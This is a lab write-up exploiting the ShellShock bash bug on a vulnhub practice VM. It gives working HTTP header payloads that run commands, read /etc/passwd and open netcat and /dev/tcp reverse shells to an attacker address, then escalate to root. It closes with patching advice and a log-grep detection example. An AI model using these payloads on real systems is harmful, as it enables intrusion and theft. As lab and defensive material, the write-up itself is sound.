CVE-2014-6271 aka ShellShock
VM provided by pentestlab; it's sort of a POC for the ShellShock vulnerability. Unlike other boot2root challenges it does not contain any flags, but the ultimate goal is the same: get root by exploiting ShellShock. It's a tiny ISO of a couple of megs; you can grab it at vulnhub.
Prerequisites -> you need a hypervisor (I am using VirtualBox). It's a live CD, so boot it directly; it auto-assigns an IP from DHCP, so make sure networking is configured already.
(Note: boot2root VMs are meant to be used in a private, non-routable IP range. Do not boot it in a production environment, and never on an internet-facing IP range, unless you have a really good reason to do so!)
CVE-2014-6271 is a bash vulnerability which affects every bash release up to and including 4.3 (fixed in bash 4.3 patch 25 and the corresponding patches for the older branches).
It allows an attacker to run arbitrary bash commands. Bash is not directly reachable from a web app, but it can be exposed indirectly via CGI (Common Gateway Interface). A CGI-capable web server copies the request headers into environment variables (HTTP_USER_AGENT, HTTP_HOST, HTTP_REFERER, and so on) before it executes the script. If the script is bash, or invokes bash, those environment variables are imported as bash variables, and a vulnerable bash that finds a value beginning with "() {" treats it as an exported function definition and then keeps going and executes whatever follows the closing brace. So with ShellShock one can run arbitrary bash commands crafted inside HTTP headers. Any header the server exports will do; the most common ones are User-Agent, Host and Referer.
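To make that mechanism concrete, here is an added example in shell (mine, not code from the original post or from the pentestlab VM). It defines the standard local check for CVE-2014-6271 and a function that mimics what a CGI server does before running a script: export the User-Agent header as HTTP_USER_AGENT and hand control to bash. The script body is an assumed stand-in for the VM's /cgi-bin/status, which this page never shows.

```shell
#!/bin/sh
# Added example, not from the original post. Two halves of the bug:
# (1) the canonical local check for CVE-2014-6271, and
# (2) the CGI path: the web server turns request headers into HTTP_*
#     environment variables before running the script.
# The script body in (2) is an assumption standing in for /cgi-bin/status.

# (1) A vulnerable bash imports the env value as a function definition AND
# executes the trailing command, so "vulnerable" shows up in the output.
# A patched bash prints only "this is a test".
local_bash_is_vulnerable() {
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)
  case "$out" in
    *vulnerable*) return 0 ;;
    *) return 1 ;;
  esac
}

# (2) Simulate the CGI server: the User-Agent header becomes HTTP_USER_AGENT
# in the child's environment, then bash runs the script. On a vulnerable bash
# a "$1" starting with "() {" is executed while the environment is imported,
# i.e. before the first line of the script body runs.
run_cgi_status_with_user_agent() {
  HTTP_USER_AGENT="$1" REQUEST_METHOD=GET SCRIPT_NAME=/cgi-bin/status \
    bash -c 'printf "Content-type: text/plain\n\n"; uptime'
}

# Try it on a vulnerable host; the output of id appears before Content-type:
#   run_cgi_status_with_user_agent '() { :;}; echo; echo; id'
```

Because the injected command runs before the script emits its own headers, anything it prints lands in front of the CGI header block; that is why the two leading echoes in the try-it line matter, as they terminate the header block so the command output becomes the HTTP body instead of a malformed header.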
Let's get started ->
I am on the 192.168.1.0/24 network. The CVE.iso machine booted and was auto-assigned the IP 192.168.1.2 (may vary with your network).
192.168.1.2 (referred to as victim throughout)
192.168.1.1 (attacker)
First thing: confirm the machine's IP (even though I already know it, just for completeness' sake).
netdiscover -i eth0

NMAP probing–>
nmap -Pn -n 192.168.1.2

Detailed NMAP scan –>
nmap -Pn -n -A 192.168.1.2

From the nmap results we know that only 2 services are up: SSH and HTTP.
Let's explore the web interface.

It's a plain-looking page, but one interesting thing: it displays the output of the bash uptime command. Interesting.
Let's take a look at the page source.

From the source we can be sure the web app runs on CGI (the page is served from /cgi-bin/status) and uses a script that calls the uptime command; since a CGI server hands request headers to that script as environment variables, this is exactly the setup ShellShock needs. The way to find out for certain is to run an intercepting proxy; our best bet is Burp Suite, so we can examine the website's behaviour in depth.
If you are on Kali, Burp Suite is already installed; if not, grab it from here.
Fire up Burp Suite.

Set up the browser proxy settings to match Burp so requests can be intercepted.

As stated earlier, we need to alter headers to check whether the server is vulnerable to ShellShock.
Let's alter the User-Agent string (via Repeater in Burp Suite). A ping back to the attacker box is a good first probe because it works blind: watch for the ICMP echo requests arriving on the attacker side rather than relying on anything in the HTTP response.
GET /cgi-bin/status HTTP/1.0
user-agent: () { :; }; /bin/bash -c 'ping -c 3 192.168.1.1'

Let's chain commands and get a bash reverse shell.
Start an nc listener on port 7337 (on the attacker's end).

In Burp, try another User-Agent crafted with a reverse shell (this relies on the victim's netcat supporting -e, which the one on this VM does):
GET /cgi-bin/status HTTP/1.0
user-agent: () { :; }; /bin/bash -c 'nc 192.168.1.1 7337 -e /bin/sh'

GOT SHELL…

With sudo -s it's game over: got root! There is another way of doing it without Burp: just send the headers with our old friend echo, right from bash.
Running arbitrary commands, e.g. reading /etc/passwd (the command substitution collapses the file to a single line, and since it runs before the script prints its own headers it comes back inside the response header block, which is why a HEAD request is enough here):
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: 192.168.1.2\r\nConnection: close\r\n\r\n" | nc 192.168.1.2 80

Reverse bash shell (using bash's /dev/tcp, so no netcat is needed on the victim; note the function body must be "{ :;}", an empty "{ ;}" is a syntax error and the trailing command never runs):
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.1/7337 0>&1\r\nHost: 192.168.1.2\r\nConnection: close\r\n\r\n" | nc 192.168.1.2 80

We get a neat shell at the nc listener that was already running in the background.

Final thoughts: ShellShock is sort of a fun vulnerability, but it has critical impact and can easily go undetected. So keep bash updated (the first fix was incomplete, so make sure you are past CVE-2014-7169 as well), verify it with the standard env-based local test, and block malicious traffic at the IPS/WAF level: the literal "() {" prefix in a header value is a reliable signature, since that exact four-byte prefix is what a vulnerable bash checks for.
Kudos to pentestlab & vulnhub for providing a good exercise.
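As an added example of the detection side (mine, not the post's), here is a tiny log check over constructed Apache access-log lines that reuse this walkthrough's payloads. The log lines are made up for the example and were not taken from the VM.

```shell
#!/bin/sh
# Added example, not from the original post. Flags ShellShock attempts in an
# Apache combined-format access log. The log below is constructed sample data
# built from the payloads used in the walkthrough.

sample_log() {
  cat <<'EOF'
192.168.1.1 - - [27/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.0" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.1 - - [27/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.0" 200 512 "-" "() { :; }; /bin/bash -c 'ping -c 3 192.168.1.1'"
192.168.1.1 - - [27/Sep/2014:10:02:31 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; echo $(</etc/passwd)"
192.168.1.1 - - [27/Sep/2014:10:03:15 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.38.0"
192.168.1.1 - - [27/Sep/2014:10:04:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() {:;}; /bin/bash -i >& /dev/tcp/192.168.1.1/7337 0>&1"
EOF
}

# A vulnerable bash only imports a value as a function if it starts with the
# exact four bytes "() {", so a fixed-string match on that prefix catches every
# working payload, whatever follows the brace. Reads the log on stdin.
flag_shellshock() {
  grep -nF '() {'
}

# Count of flagged lines in the sample; on a real box:
#   flag_shellshock < /var/log/apache2/access.log
count_shellshock() {
  sample_log | grep -cF '() {'
}
```

Only the User-Agent and Referer make it into the default combined log format, so a payload carried in Host, Cookie or another header will not show up here; that is the "easily undetected" part, and the reason to watch for the same string in full-packet data at the IPS or in a WAF that sees every header.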